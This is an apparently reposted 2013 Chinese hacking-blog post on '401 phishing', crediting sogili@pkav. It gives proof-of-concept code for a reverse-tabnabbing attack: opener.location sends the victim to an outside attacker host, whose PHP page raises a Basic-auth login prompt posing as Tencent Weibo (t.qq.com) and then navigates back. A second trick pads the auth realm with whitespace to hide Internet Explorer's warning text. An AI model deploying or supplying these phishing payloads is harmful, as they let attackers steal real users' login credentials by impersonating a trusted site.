<script> history.back();//返回到腾讯微博 </script> 缺点:IE不支持. 腾讯微博demo IE空白符缺陷: 由于IE的401询问框设计错401钓鱼新玩法 By sogili@pkav_记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华黑客技术" />
记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

401钓鱼新玩法 By sogili@pkav

2013-01-07 12:35

前段时间401钓鱼很火,大部分呢是通过向网页插入一个401地址的图片进行钓鱼.但这种方法对于chrome和不支持外链图片的站来说,例如:微博.


反向401钓鱼:

反向401的意思是通过opener.location反向控制调用页地址到401钓鱼页面.



POC:



opener.location='http://mmme.me/401.php'

close();



401.php:



<?php

header('WWW-Authenticate: Basic realm="t.qq.com[若干空格...]"');

?>

<script>

history.back();//返回到腾讯微博

</script>



缺点:IE不支持.

腾讯微博demo


IE空白符缺陷:

由于IE的401询问框设计错误,导致我们可以在服务器响应的认证提示信息后面追加大量的空白符将后面的默认内容挤掉,达到调用的目的.

POC:



<?php header('WWW-Authenticate: Basic realm="t.qq.com "'); ?>



IE8:



IE9:

知识来源: pkav.net/2013/01/314.html

阅读:101731 | 评论:0 | 标签:技术文档

想收藏或者和大家分享这篇好文章→复制链接地址

“401钓鱼新玩法 By sogili@pkav”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词